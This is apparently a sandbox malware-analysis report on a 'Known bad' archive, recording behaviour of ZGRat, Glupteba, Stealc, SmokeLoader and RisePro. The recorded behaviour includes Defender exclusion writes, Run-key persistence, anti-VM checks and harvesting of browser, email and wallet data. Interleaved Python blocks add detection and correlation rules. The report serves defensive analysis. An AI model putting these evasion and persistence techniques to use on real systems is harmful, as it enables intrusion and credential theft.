Analysis Overview
SHA256
f2085a595daeffe3d442f07fee0ef1a2d77cdb521fd4ff4475efd87c75da1932
Threat Level: Known bad
The file release_v4.rar was found to be: Known bad.
Malicious Activity Summary
Detect ZGRat V1
ZGRat
Glupteba
Stealc
SmokeLoader
Windows security bypass
Glupteba payload
RisePro
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Modifies boot configuration data using bcdedit
Downloads MZ/PE file
Modifies Windows Firewall
Possible attempt to disable PatchGuard
Checks BIOS information in registry
Reads user/profile data of local email clients
Windows security modification
Identifies Wine through registry keys
Loads dropped DLL
Reads user/profile data of web browsers
Reads data files stored by FTP clients
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Checks installed software on the system
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks whether UAC is enabled
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Drops Chrome extension
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Windows directory
Launches sc.exe
Program crash
Enumerates physical storage devices
Unsigned PE
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Checks processor information in registry
Modifies system certificate store
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Enumerates system info in registry
Uses Task Scheduler COM API
outlook_win_path
Modifies registry class
Modifies Internet Explorer settings
Checks SCSI registry key(s)
Creates scheduled task(s)
outlook_office_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-23 08:59
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:03
Platform
win10v2004-20240221-en
Max time kernel
110s
Max time network
169s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1980 wrote to memory of 3320 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1980 wrote to memory of 3320 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1980 wrote to memory of 3320 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
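The nine Network rows above are all reverse (PTR) lookups sent to 8.8.8.8, and the report prints only the in-addr.arpa names, which hide the forward addresses an analyst actually wants to pivot on. The following Python is an added example and is not part of the sandbox report: PTR_QUERIES is constructed by copying the Domain column above, and the decoder and /24 grouping are my own helpers, not a sandbox feature.

```python
"""Recover forward IPv4 addresses from the PTR names in a sandbox Network table.

Added example; the query list below is constructed from the Domain column of
the behavioral8 Network table, the functions are mine.
"""
from __future__ import annotations

import ipaddress

# Constructed from the report's Domain column (PTR queries to 8.8.8.8:53).
PTR_QUERIES = [
    "23.159.190.20.in-addr.arpa",
    "205.47.74.20.in-addr.arpa",
    "179.178.17.96.in-addr.arpa",
    "86.23.85.13.in-addr.arpa",
    "206.23.85.13.in-addr.arpa",
    "217.135.221.88.in-addr.arpa",
    "0.205.248.87.in-addr.arpa",
    "19.229.111.52.in-addr.arpa",
    "1.173.189.20.in-addr.arpa",
]


def ptr_to_ipv4(name: str) -> ipaddress.IPv4Address | None:
    """'23.159.190.20.in-addr.arpa' -> 20.190.159.23.

    Returns None for anything that is not a complete four-octet PTR name
    (partial zone names, IPv6 ip6.arpa names, ordinary hostnames, bad octets).
    """
    labels = name.rstrip(".").lower().split(".")
    if len(labels) != 6 or labels[-2:] != ["in-addr", "arpa"]:
        return None
    try:
        # PTR names carry the octets in reverse order.
        return ipaddress.IPv4Address(".".join(reversed(labels[:4])))
    except ValueError:
        return None


def resolved_targets(names):
    """Unique forward IPs (sorted numerically) plus a /24 summary.

    The /24 view makes it obvious when several lookups hit one network,
    which is the usual sign of a single service rather than several peers.
    """
    ips = {ip for ip in map(ptr_to_ipv4, names) if ip is not None}
    by_net: dict[ipaddress.IPv4Network, list[ipaddress.IPv4Address]] = {}
    for ip in ips:
        net = ipaddress.ip_network(f"{ip}/24", strict=False)
        by_net.setdefault(net, []).append(ip)
    summary = {str(net): [str(ip) for ip in sorted(v)] for net, v in by_net.items()}
    return sorted(ips), summary


if __name__ == "__main__":
    ips, nets = resolved_targets(PTR_QUERIES)
    for net, members in sorted(nets.items()):
        print(net, members)
```

A reverse lookup only proves that something on the guest wanted a name for that address, not that the sample connected to it; check the decoded addresses against your own allowlist of Windows update, telemetry and CDN ranges before promoting any of them to a C2 indicator.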
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win7-20240221-en
Max time kernel
118s
Max time network
125s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2984 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2984 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2984 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2984 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2984 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2984 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2984 wrote to memory of 2144 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win7-20240215-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\rundll32.exe | N/A |
Processes
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\Admin\AppData\Local\Temp\bentonite.png
Network
Files
memory/1764-0-0x0000000000220000-0x0000000000221000-memory.dmp
memory/1764-1-0x0000000000220000-0x0000000000221000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win7-20240220-en
Max time kernel
55s
Max time network
154s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
SmokeLoader
Stealc
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\oO_q1f2AwSXGxmbqM3esoqyX.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Wine | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\oO_q1f2AwSXGxmbqM3esoqyX.exe = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\manifest.json | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
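The registry and object rows in this run (the Windows Defender exclusion writes, the VBOX__ ACPI key open, the Run key, the EnableLUA query and the VBoxMiniRdrDN device open above) are listed signature by signature, so the relationship between them is left to the reader: the same process that registers C:\Windows\rss\csrss.exe under Run also excludes both the C:\Windows\rss folder and the csrss.exe process name from Defender. The Python below is an added example, not code from the sandbox or from this report. EVENTS is constructed by copying a handful of the rows above (plus one tzres MuiCache row that must not fire); the rule names, the ATT&CK technique IDs, the Rule and Finding types and the correlation step are my own choices.

```python
"""Tag sandbox registry/object events with ATT&CK techniques and correlate them.

Added example, not part of the sandbox or the report. EVENTS is constructed
from rows on this page; rule names, technique IDs and the correlation logic
are mine, not the sandbox's.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

PROC = r"C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe"
SETUP = r"C:\Users\Admin\AppData\Local\Temp\setup.exe"
DEF = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions"
RUN = (r"\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000"
       r"\Software\Microsoft\Windows\CurrentVersion\Run")

# Constructed from the report's rows; the last entry is tzres MuiCache noise.
EVENTS = [
    {"op": "Set value (int)", "path": DEF + r"\Paths\C:\Windows\rss", "value": "0", "process": PROC},
    {"op": "Set value (int)", "path": DEF + r"\Processes\csrss.exe", "value": "0", "process": PROC},
    {"op": "Set value (int)", "path": DEF + r"\Paths\C:\Windows\System32\drivers", "value": "0", "process": PROC},
    {"op": "Set value (str)", "path": RUN + r"\csrss", "value": r'"C:\Windows\rss\csrss.exe"', "process": PROC},
    {"op": "Key opened", "path": r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__", "value": None, "process": SETUP},
    {"op": "File opened (read-only)", "path": r"\??\VBoxMiniRdrDN", "value": None, "process": PROC},
    {"op": "Key value queried", "path": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", "value": None, "process": SETUP},
    {"op": "Set value (str)", "path": r"\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272", "value": "Greenwich Standard Time", "process": PROC},
]


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str            # ATT&CK technique ID (my mapping)
    pattern: re.Pattern
    ops: frozenset | None     # operations the rule applies to; None = any


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str
    process: str
    path: str
    value: str | None


RULES = [
    Rule("defender_exclusion_added", "T1562.001",
         re.compile(r"\\Windows Defender\\Exclusions\\(Paths|Processes|Extensions)\\", re.I),
         frozenset({"Set value (int)", "Set value (str)", "Key created"})),
    Rule("run_key_persistence", "T1547.001",
         re.compile(r"\\CurrentVersion\\Run(Once)?\\[^\\]+$", re.I),
         frozenset({"Set value (str)", "Set value (data)"})),
    Rule("vm_or_wine_probe", "T1497.001",
         re.compile(r"\\ACPI\\DSDT\\VBOX__$|\\\?\?\\VBox\w+$|\\Software\\Wine$", re.I), None),
    Rule("uac_state_query", "T1012",
         re.compile(r"\\Policies\\System\\EnableLUA$", re.I), frozenset({"Key value queried"})),
]


def classify(events) -> list[Finding]:
    """Apply every rule to every event; an event may yield several findings."""
    out = []
    for ev in events:
        for rule in RULES:
            if rule.ops is not None and ev["op"] not in rule.ops:
                continue
            if rule.pattern.search(ev["path"]):
                out.append(Finding(rule.name, rule.technique, ev["process"], ev["path"], ev["value"]))
    return out


def techniques_by_process(findings) -> dict[str, list[str]]:
    by: dict[str, set] = {}
    for f in findings:
        by.setdefault(f.process, set()).add(f.technique)
    return {p: sorted(t) for p, t in by.items()}


def _is_under(child: PureWindowsPath, parent: PureWindowsPath) -> bool:
    c = [s.lower() for s in child.parts]
    p = [s.lower() for s in parent.parts]
    return len(c) > len(p) and c[:len(p)] == p


def correlate(findings):
    """Pair each Run-key binary with the Defender exclusions that shield it.

    Covers both forms seen in the report: the binary's directory is an
    excluded Path, or its file name is an excluded Process.
    """
    excl_paths, excl_procs = [], set()
    for f in findings:
        if f.rule != "defender_exclusion_added":
            continue
        m = re.search(r"\\Exclusions\\(Paths|Processes)\\(.+)$", f.path)
        if m is None:
            continue
        (excl_paths.append(PureWindowsPath(m.group(2))) if m.group(1) == "Paths"
         else excl_procs.add(m.group(2).lower()))
    pairs = []
    for f in findings:
        if f.rule != "run_key_persistence" or not f.value:
            continue
        binary = PureWindowsPath(f.value.strip().strip('"'))
        shields = []
        if binary.name.lower() in excl_procs:
            shields.append(f"process exclusion {binary.name}")
        shields += [f"path exclusion {p}" for p in excl_paths if _is_under(binary, p)]
        if shields:
            pairs.append((str(binary), shields))
    return pairs


if __name__ == "__main__":
    fs = classify(EVENTS)
    print(techniques_by_process(fs))
    print(correlate(fs))
```

The correlation step is the part worth keeping: a Defender exclusion on its own is noisy (installers add them), and a Run key on its own is noisy, but a Run key whose target sits inside an exclusion written by the same process is a strong, low-volume signal. Extend EVENTS with your own EDR or Sysmon registry events (EventID 13 carries the same path/value shape) to run the same rules outside the sandbox.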
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Logs\CBS\CbsPersist_20240223090023.cab | C:\Windows\system32\makecab.exe | N/A |
| File created | C:\Windows\Tasks\beMXFFiCiqlBKkvOrW.job | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6C6B.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
